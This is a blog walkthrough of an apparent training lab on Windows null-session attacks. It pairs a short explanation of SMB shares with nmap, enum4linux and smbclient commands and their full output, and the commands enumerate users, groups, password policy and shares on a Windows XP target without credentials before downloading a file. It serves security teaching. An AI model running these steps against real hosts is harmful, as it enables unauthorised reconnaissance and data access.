The final goal of the blog is to tell you how to retrieve information from the target machine such as shares, users, groups and so on! Moreover by navigating the remote machine, you should be able to find a file name "Congratulations.txt\". Download it and explore its content.
A windows share machine can share a file or a directory on the
network; this lets local and remote users access the resources and, possible,
modify it. Eliminate Your Fears And Doubts About Null Session Attack
Example
A file server in an office lets users open
and edit the document of their own departement, while it lets everyone read
but modify public information files.
This features is very useful
in a network environment. The ability to share resources and files reduces
redundancy and can improve work efficiency in a company.Shares can be either
extremely useful if used properly or extremely dangerous when configured
improperly.Creating network shares in a windows based environment is fairly
easy. Generally uses just need to turn on the file and printer sharing
services and then they can start using directories or files to share.
Users
can also set permissions on a share showing who can perform operations such as
reading and writing and modifying permissions. Starting from windows which the
users can choose to share a single file or use the public directory when
sharing a single file they can choose local or remote users to share the file
with.When using the public directory they can choose which local users can
access the files on the share but they can only allow everyone or no one in
the network to access the share.
An authorised
user can access share by using universal naming convention path (UNC path).
The Format of a UNC path is-
\\ServerName\ShareName\file.nat
Administrative shares
There are also some special default administrative shares which are used
by system administrators and windows itself:
\\Computer Nmae\C$
lets and administrator access a volume on the local machine. Every volume has
a share (C$, D$, E$, etc).
\\ComputerName\admin$
points to the windows installation directory.
\\ComputerName\ipc$
is used for inter-process communication. You cannot browse it via windows
explorer.
You can test volume share and the admin$
share on your computer by entering the following on a windows explorer address
bar
\\localhost\<sharename>
\\localhost\d$
Null session attacks can be used to enumerate write a lot of
information. Attackers can steal information about-
#
Passwords
# System Users
# System Group
#
Running system processes
Null sessions remotely exploitable
this means that attackers can use their computers to attack a vulnerable
windows machine. Moreover, this can be used to call remotely
API and remote procedure calls because of these factors Null
session attack had a huge impact on windows ecosystem.
Nowadays is
configured to be a immune from this kind of attack. However, legacy hosts can
still be vulnerable.
A null session case and vulnerability for
windows administrative shares, this lets an attacker and connect to a local or
remote share without authentication.
We will go through the
enumeration of windows shares and their exploitation by using various
techniques and tools.
Tools
The best tools for this lab are:
# emun4linux
#
samrdump
# smbclient
Steps
# Find a target in the network
# Check for null
session
# Exploit null session
It\'s time to get our
hands dirty.
# Gather information with
enum4linux
Use enum4linux and gather the following information:
# Shares
# Users
# Password policies
#
Groups
Use smbclient to navigate the target machine
Mount or use the smbclient interactive command line in order to
navigate the remote machine and find and inspect the content of the
Congratulations.txt file.
Find a target in the network
We first need to verify which the remote network is. We can do it by
running ifconfig and checking the IP address of our tap0 interface.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr] └─$ ifconfig eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 ether b4:b6:86:47:55:83 txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 2201 bytes 96326 (94.0 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 2201 bytes 96326 (94.0 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.99.101 netmask 255.255.255.0 broadcast 0.0.0.0 inet6 fe80::5044:42ff:fe4d:3eb6 prefixlen 64 scopeid 0x20<link> ether 52:44:42:4d:3e:b6 txqueuelen 1000 (Ethernet) RX packets 3 bytes 363 (363.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 522 bytes 22356 (21.8 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.98.25 netmask 255.255.255.0 broadcast 192.168.98.255 inet6 2409:4064:95:e81b:3e1a:d593:a513:ecb9 prefixlen 64 scopeid 0x0<global> inet6 fe80::aa80:f129:e78d:aa96 prefixlen 64 scopeid 0x20<link> ether fc:01:7c:29:00:77 txqueuelen 1000 (Ethernet) RX packets 92211 bytes 102634365 (97.8 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 55571 bytes 9521350 (9.0 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr] └─$
As we can see the target network is 192.168.99.0/24 (note that your IP address may be different from the previous screenshot). Let\'s run nmap in order to discover alive hosts on the network:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr] └─$ sudo nmap -sn 192.168.99.0/24 Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-26 21:02 IST Nmap scan report for 192.168.99.162 Host is up (0.53s latency). MAC Address: 00:50:56:A5:DF:D7 (VMware) Nmap scan report for 192.168.99.101 Host is up. Nmap done: 256 IP addresses (2 hosts up) scanned in 18.25 seconds ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr] └─$
The previous screenshot shows that the only host alive on the network is
192.168.99.162 (besides our host: 192.168.99.20).
Check for null session
Let us target the host found in the previous step and check if it is
vulnerable to null sessions. In the following screenshot, we are using
enum4linux, but you can use any tool you prefer.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr] └─$ enum4linux -n 192.168.99.162 255 ⨯ Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:03:21 2021 ========================== | Target Information | ========================== Target ........... 192.168.99.162 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ====================================================== | Enumerating Workgroup/Domain on 192.168.99.162 | ====================================================== [+] Got domain/workgroup name: WORKGROUP ============================================== | Nbtstat Information for 192.168.99.162 | ============================================== Looking up status of 192.168.99.162 ELS-WINXP <00> - B <ACTIVE> Workstation Service WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name ELS-WINXP <20> - B <ACTIVE> File Server Service WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections WORKGROUP <1d> - B <ACTIVE> Master Browser ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser MAC Address = 00-50-56-A5-DF-D7 ======================================= | Session Check on 192.168.99.162 | ======================================= [+] Server 192.168.99.162 allows sessions using username '', password '' ============================================= | Getting domain SID for 192.168.99.162 | ============================================= Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup enum4linux complete on Sun Dec 26 21:03:38 2021 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr] └─$
We can see that the File Server Service is active and the string \<20>
appears in the list.
Exploit null session
It is time to get our hands dirty!
Gather information with enum4linux
Let us try to gather as much information as we can. To do this we can simply
run enum4linux with the -a switch:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr] └─$ enum4linux -n 192.168.99.162 255 ⨯ Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:03:21 2021 ========================== | Target Information | ========================== Target ........... 192.168.99.162 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ====================================================== | Enumerating Workgroup/Domain on 192.168.99.162 | ====================================================== [+] Got domain/workgroup name: WORKGROUP ============================================== | Nbtstat Information for 192.168.99.162 | ============================================== Looking up status of 192.168.99.162 ELS-WINXP <00> - B <ACTIVE> Workstation Service WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name ELS-WINXP <20> - B <ACTIVE> File Server Service WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections WORKGROUP <1d> - B <ACTIVE> Master Browser ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser MAC Address = 00-50-56-A5-DF-D7 ======================================= | Session Check on 192.168.99.162 | ======================================= [+] Server 192.168.99.162 allows sessions using username '', password '' ============================================= | Getting domain SID for 192.168.99.162 | ============================================= Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup enum4linux complete on Sun Dec 26 21:03:38 2021 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr] └─$ enum4linux -a 192.168.99.162 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:05:14 2021 ========================== | Target Information | ========================== Target ........... 192.168.99.162 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ====================================================== | Enumerating Workgroup/Domain on 192.168.99.162 | ====================================================== [+] Got domain/workgroup name: WORKGROUP ============================================== | Nbtstat Information for 192.168.99.162 | ============================================== Looking up status of 192.168.99.162 ELS-WINXP <00> - B <ACTIVE> Workstation Service WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name ELS-WINXP <20> - B <ACTIVE> File Server Service WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections WORKGROUP <1d> - B <ACTIVE> Master Browser ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser MAC Address = 00-50-56-A5-DF-D7 ======================================= | Session Check on 192.168.99.162 | ======================================= [+] Server 192.168.99.162 allows sessions using username '', password '' ============================================= | Getting domain SID for 192.168.99.162 | ============================================= Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ======================================== | OS information on 192.168.99.162 | ======================================== Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464. [+] Got OS info for 192.168.99.162 from smbclient: [+] Got OS info for 192.168.99.162 from srvinfo: 192.168.99.162 Wk Sv NT PtB LMB platform_id : 500 os version : 5.1 server type : 0x51003 =============================== | Users on 192.168.99.162 | =============================== index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain index: 0x2 RID: 0x3eb acb: 0x00000210 Account: eLS Name: (null) Desc: (null) index: 0x3 RID: 0x3ed acb: 0x00000210 Account: Frank Name: Frank Desc: (null) index: 0x4 RID: 0x1f5 acb: 0x00000214 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0x5 RID: 0x3e8 acb: 0x00000211 Account: HelpAssistant Name: Remote Desktop Help Assistant Account Desc: Account for Providing Remote Assistance index: 0x6 RID: 0x3ec acb: 0x00000210 Account: netadmin Name: netadmin Desc: (null) index: 0x7 RID: 0x3ea acb: 0x00000211 Account: SUPPORT_388945a0 Name: CN=Microsoft Corporation,L=Redmond,S=Washington,C=US Desc: This is a vendor's account for the Help and Support Service user:[Administrator] rid:[0x1f4] user:[eLS] rid:[0x3eb] user:[Frank] rid:[0x3ed] user:[Guest] rid:[0x1f5] user:[HelpAssistant] rid:[0x3e8] user:[netadmin] rid:[0x3ec] user:[SUPPORT_388945a0] rid:[0x3ea] =========================================== | Share Enumeration on 192.168.99.162 | =========================================== Sharename Type Comment --------- ---- ------- My Documents Disk IPC$ IPC Remote IPC Frank Disk C Disk WorkSharing Disk FrankDocs Disk ADMIN$ Disk Remote Admin C$ Disk Default share Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- [+] Attempting to map shares on 192.168.99.162 //192.168.99.162/IPC$ Mapping: OK Listing: DENIED //192.168.99.162/Frank Mapping: OK Listing: DENIED //192.168.99.162/C [E] Can't understand response: AUTOEXEC.BAT A 0 Fri Feb 13 06:20:47 2015 boot.ini HS 211 Fri Feb 13 06:16:17 2015 CONFIG.SYS A 0 Fri Feb 13 06:20:47 2015 Documents and Settings D 0 Wed Feb 18 14:55:58 2015 IO.SYS AHSR 0 Fri Feb 13 06:20:47 2015 MSDOS.SYS AHSR 0 Fri Feb 13 06:20:47 2015 NTDETECT.COM AHSR 47564 Tue Aug 3 22:38:34 2004 ntldr AHSR 250032 Tue Aug 3 22:59:34 2004 pagefile.sys AHS 805306368 Thu Dec 23 22:59:58 2021 Program Files DR 0 Mon Oct 3 21:40:27 2016 System Volume Information DHS 0 Fri Feb 13 06:24:12 2015 WINDOWS D 0 Mon Oct 3 21:42:49 2016 785224 blocks of size 4096. 345608 blocks available //192.168.99.162/WorkSharing Mapping: OK, Listing: OK //192.168.99.162/FrankDocs Mapping: OK Listing: DENIED //192.168.99.162/ADMIN$ Mapping: DENIED, Listing: N/A //192.168.99.162/C$ Mapping: DENIED, Listing: N/A ====================================================== | Password Policy Information for 192.168.99.162 | ====================================================== [+] Attaching to 192.168.99.162 using a NULL share [+] Trying protocol 139/SMB... [!] Protocol failed: Cannot request session (Called Name:192.168.99.162) [+] Trying protocol 445/SMB... [+] Found domain(s): [+] ELS-WINXP [+] Builtin [+] Password Info for Domain: ELS-WINXP [+] Minimum password length: None [+] Password history length: None [+] Maximum password age: 42 days 22 hours 47 minutes [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not Set [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 0 ================================ | Groups on 192.168.99.162 | ================================ [+] Getting builtin groups: group:[Administrators] rid:[0x220] group:[Backup Operators] rid:[0x227] group:[Guests] rid:[0x222] group:[Network Configuration Operators] rid:[0x22c] group:[Power Users] rid:[0x223] group:[Remote Desktop Users] rid:[0x22b] group:[Replicator] rid:[0x228] group:[Users] rid:[0x221] [+] Getting builtin group memberships: Group 'Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE Group 'Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users Group 'Users' (RID: 545) has member: ELS-WINXP\netadmin Group 'Users' (RID: 545) has member: ELS-WINXP\Frank Group 'Guests' (RID: 546) has member: ELS-WINXP\Guest Group 'Administrators' (RID: 544) has member: ELS-WINXP\Administrator Group 'Administrators' (RID: 544) has member: ELS-WINXP\eLS Group 'Administrators' (RID: 544) has member: ELS-WINXP\netadmin [+] Getting local groups: group:[HelpServicesGroup] rid:[0x3e9] [+] Getting local group memberships: Group 'HelpServicesGroup' (RID: 1001) has member: ELS-WINXP\SUPPORT_388945a0 [+] Getting domain groups: group:[None] rid:[0x201] [+] Getting domain group memberships: Group 'None' (RID: 513) has member: ELS-WINXP\Administrator Group 'None' (RID: 513) has member: ELS-WINXP\Guest Group 'None' (RID: 513) has member: ELS-WINXP\HelpAssistant Group 'None' (RID: 513) has member: ELS-WINXP\SUPPORT_388945a0 Group 'None' (RID: 513) has member: ELS-WINXP\eLS Group 'None' (RID: 513) has member: ELS-WINXP\netadmin Group 'None' (RID: 513) has member: ELS-WINXP\Frank ========================================================================= | Users on 192.168.99.162 via RID cycling (RIDS: 500-550,1000-1050) | ========================================================================= [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-21-823518204-2025429265-839522115 [+] Enumerating users using SID S-1-5-32 and logon username '', password '' [+] Enumerating users using SID S-1-5-21-823518204-2025429265-839522115 and logon username '', password '' =============================================== | Getting printer info for 192.168.99.162 | =============================================== Cannot connect to server. Error was NT_STATUS_NETWORK_UNREACHABLE enum4linux complete on Sun Dec 26 22:35:32 2021 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr] └─$
As we can see in the previous screenshots, we were able to gather a lot of
information from the machine.
Use smbclient to navigate the target machine
A very useful tool that we can use to access remote shares and browse
the remote machine is smbclient.
First let us get the list of
shares using smbclient:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr] └─$ sudo smbclient -L WORKGROUP -I 192.168.99.162 -N -U "" Sharename Type Comment --------- ---- ------- My Documents Disk IPC$ IPC Remote IPC Frank Disk C Disk WorkSharing Disk FrankDocs Disk ADMIN$ Disk Remote Admin C$ Disk Default share Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr] └─$
Let us now try to access the WorkSharing share and see what files are stored
in there:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr] └─$ 1 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr] └─$ sudo smbclient \\\\192.168.99.162\\WorkSharing -N 1 ⨯ Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Feb 18 16:37:31 2015 .. D 0 Wed Feb 18 16:37:31 2015 Congratulations.txt A 66 Wed Feb 18 15:11:59 2015 785224 blocks of size 4096. 345613 blocks available smb: \> smb: \> get congratulations.txt /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt getting file \congratulations.txt of size 66 as /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) smb: \>
As we can see in the previous screenshot there is a file
namedCongratulations.txt. Let us download it into our machine and then use the
cat command to display its content.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr] └─$ cat congratulations.txt Congratulations! You have successfully exploited a null session! ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr] └─$
Very informative
ReplyDelete